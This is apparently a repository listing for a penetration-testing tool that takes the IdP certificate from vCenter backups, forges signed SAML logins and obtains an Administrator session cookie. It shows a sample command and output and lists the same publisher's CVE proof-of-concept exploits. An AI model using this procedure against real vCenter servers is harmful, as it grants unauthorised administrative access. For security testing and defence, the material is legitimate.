• Stars
    star
    477
  • Rank 92,112 (Top 2 %)
  • Language
    Python
  • License
    MIT License
  • Created about 3 years ago
  • Updated about 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

A tool to extract the IdP cert from vCenter backups and log in as Administrator

vCenter SAML Login Tool

A tool to extract the Identity Provider (IdP) cert from vCenter backups and log in as Administrator

Background

Commonly, during engagements, we will gain access to vCenter backups on a fileserver or gain root access to the VCSA host through recent CVEs. Logging into the vCenter vSphere UI allows us to easily gain access to more systems, confidential information, as well as show customers the impact of these findings.

The data.mdb file contains the certificates and can be found within vCenter backups as well as on the VCSA host with root permissions. These certificates are stored in cleartext and can be used to sign any SAML authentication request for any user - including the builtin Administrator.

If you'd like to know more about several use cases for this tool and how we've used it to gain Administrative access to vCenter hosts check out our blog post: https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/

Usage

root@kali:~/vcenter# python3 vcenter_saml_login.py -p data.mdb -t 10.0.100.200
[*] Successfully extracted the IdP certificate
[*] Successfully extracted trusted certificate 1
[*] Successfully extracted trusted certificate 2
[*] Obtaining hostname from vCenter SSL certificate
[*] Found hostname vcsa.olympus for 10.0.100.200
[*] Initiating SAML request with 10.0.100.200
[*] Generating SAML assertion
[*] Signing the SAML assertion
[*] Attempting to log into vCenter with the signed SAML request
[+] Successfuly obtained Administrator cookie for 10.0.100.200!
[+] Cookie: VSPHERE-UI-JSESSIONID=06D1630719B4DE33A4CE653458911640

With the above cookie, visit the VCSA instance at https://<VCSA>/ui, add the cookie under the /ui path, and re-browse to https://<VCSA>/ui.

Demonstration

Disclaimer

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.

More Repositories

1

CVE-2022-40684

A proof of concept exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager
Python
336
star
2

CVE-2022-39952

POC for CVE-2022-39952
Python
266
star
3

CVE-2021-21972

Proof of Concept Exploit for vCenter CVE-2021-21972
Python
248
star
4

CVE-2021-38647

Proof on Concept Exploit for CVE-2021-38647 (OMIGOD)
Python
234
star
5

CVE-2022-1388

POC for CVE-2022-1388
Python
230
star
6

CVE-2022-22972

Python
154
star
7

vRealizeLogInsightRCE

POC for RCE using vulnerabilities described in VMSA-2023-0001
Python
149
star
8

CVE-2023-34362

MOVEit CVE-2023-34362
Python
136
star
9

CVE-2022-47966

POC for CVE-2022-47966 affecting multiple ManageEngine products
Python
123
star
10

proxyshell

Proof of Concept for CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207
Python
107
star
11

CVE-2023-27524

Basic PoC for CVE-2023-27524: Insecure Default Configuration in Apache Superset
Python
101
star
12

backup_dc_registry

A simple POC that abuses Backup Operator privileges to remote dump SAM, SYSTEM, and SECURITY
Python
71
star
13

CVE-2023-34051

VMware Aria Operations for Logs CVE-2023-34051
Python
63
star
14

CVE-2024-0204

Authentication Bypass in GoAnywhere MFT
Python
61
star
15

CVE-2023-27532

POC for Veeam Backup and Replication CVE-2023-27532
C#
58
star
16

CVE-2023-27350

Proof of Concept Exploit for PaperCut CVE-2023-27350
Python
45
star
17

CVE-2022-28219

PoC for ManageEngine ADAudit Plus CVE-2022-28219
Python
44
star
18

CVE-2023-48788

Fortinet FortiClient EMS SQL Injection
Python
42
star
19

CVE-2023-38035

Ivanti Sentry CVE-2023-38035
Python
39
star
20

CVE-2024-23108

CVE-2024-23108: Fortinet FortiSIEM Unauthenticated 2nd Order Command Injection
Python
31
star
21

CVE-2021-44077

Proof of Concept Exploit for ManageEngine ServiceDesk Plus CVE-2021-44077
Python
29
star
22

CVE-2023-34992

CVE-2023-34992: Fortinet FortiSIEM Command Injection Proof of Concept Exploit
Python
25
star
23

CVE-2023-26067

Lexmark CVE-2023-26067
Python
22
star
24

CVE-2024-1403

Progress OpenEdge Authentication Bypass
Java
16
star
25

h3-cli

CLI tool for the Horizon3.ai API
Shell
14
star
26

CVE-2024-29824

Ivanti EPM SQL Injection Remote Code Execution Vulnerability
Python
13
star
27

CVE-2021-44142

Python
10
star
28

cyanide

Python
9
star
29

SecureConnect-Auth-Bypass

An exploit proof of concept for ConnectWise SecureConnect authentication bypass vulnerability.
Python
9
star